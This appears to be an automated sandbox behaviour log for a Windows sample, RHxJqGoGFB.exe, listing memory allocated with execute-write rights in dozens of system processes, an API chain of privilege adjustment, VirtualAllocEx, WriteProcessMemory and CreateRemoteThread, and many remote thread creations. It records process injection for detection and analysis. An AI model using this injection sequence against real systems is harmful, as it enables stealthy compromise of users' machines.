        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: A90000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 210000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: F90000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe  Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 90000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A70000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dllhost.exe base: A90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: C80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: 780000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 670000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: DC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 8C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 980000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: B50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\explorer.exe base: 3450000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: DD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: B20000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 320000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 610000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 460000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 990000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 210000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: AA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 220000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: FA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A80000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dllhost.exe base: AA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: C90000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 3B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\conhost.exe base: 790000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe base: 3F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 680000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: DD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\fontdrvhost.exe base: 8D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\dwm.exe base: 990000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\sihost.exe base: B60000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: 9B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: A40000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: AF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\explorer.exe base: 3460000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\svchost.exe base: DE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: BF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: B30000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: B50000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 330000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 620000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 470000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 220000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: AB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 230000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: FB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Code function: 0_2_00901EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: 7F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: 840000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: C90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: CA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: 1290000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: 12A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: F60000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: F70000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: DA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: DB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: 7D0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: 7E0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: B90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: BA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: BB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe EIP: BC0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 13A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 13B0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 790000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 7A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: E00000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: E50000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 15A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 15F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 700000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 710000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 7D0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 7E0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BC0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BD0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1340000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1390000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A20000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1300000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1310000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: B90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 690000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 6A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A20000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A30000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: B90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BE0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 5D0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 5E0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: FB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: FC0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: F10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: F20000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 590000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 5A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 800000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 850000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: B90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BE0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: F80000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: F90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: B60000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A00000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1050000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1060000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: DA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: DB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 14B0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 14C0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 580000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 590000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 920000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 970000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 520000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 530000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 4F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 500000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BC0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BD0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 860000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 870000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 5D0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 5E0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1140000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1150000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 9B0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 9C0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 10A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 10B0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A20000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: DB0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: DC0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 6E0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 6F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 3B0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 3C0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 9F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A00000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1360000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1370000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A00000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: AE0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 6E0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 6F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 660000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 670000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: E60000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: E70000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 800000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 810000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 12B0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 12C0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: CC0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: CD0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: AE0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1040000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1050000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1320000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1330000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1360000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1370000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 13A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 13B0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 850000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 860000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A20000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A30000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 870000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 880000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: F90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: FA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 10A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 10F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 750000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 7A0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 9C0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 9D0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 870000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 880000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: D20000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 660000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 670000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: A90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: AE0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: B90000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BA0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 850000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 860000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1300000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1310000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: B60000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: B70000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: C10000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: C20000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: FD0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1020000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: B70000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: B80000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 13E0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 1430000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 6E0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: 6F0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BC0000
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe Thread created: unknown EIP: BD0000
